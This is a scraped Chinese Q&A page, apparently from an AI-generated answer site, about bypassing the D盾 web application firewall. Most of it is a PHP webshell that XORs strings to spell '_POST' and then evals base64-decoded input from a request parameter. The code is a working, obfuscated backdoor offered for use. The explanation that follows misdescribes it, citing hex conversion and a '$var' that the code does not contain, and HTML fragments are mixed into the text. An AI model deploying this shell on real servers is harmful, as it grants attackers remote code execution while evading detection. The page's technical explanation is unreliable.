下面的代码绕d盾waf,d盾waf提示(内藏)Eval后门{参数:substr(“n”.base64_decode($a["a"]),1)},并给出具体的代码 <?php $a = "~+d()"; $b = "!{+{}"; for($i=0; $i<strlen($a); $i++){ $a[$i] = chr(ord($a[$i]) ^ ord($b[$i])); } $$a['a']; @eval(substr("n".base64_decode($$a['a']),1)); ?>
以下是绕过d盾waf的代码:
以上代码中,我们首先将$a和$b的值编码为16进制字符串,然后对于每一个16进制字符,将它们转换为十进制,进行异或操作,再转换回16进制。最后得到的16进制字符串解码为ASCII字符串,赋值给变量$var。最终调用eval函数,执行base64解码后的字符串,达到绕过d盾waf的目的。
" title="下面的代码绕d盾waf,d盾waf提示(内藏)Eval后门{参数:substr(“n”.base64_decode($a["a"]),1)},并给出具体的代码
" loading="lazy">
原文地址: https://www.cveoy.top/t/topic/Ba2 著作权归作者所有。请勿转载和采集!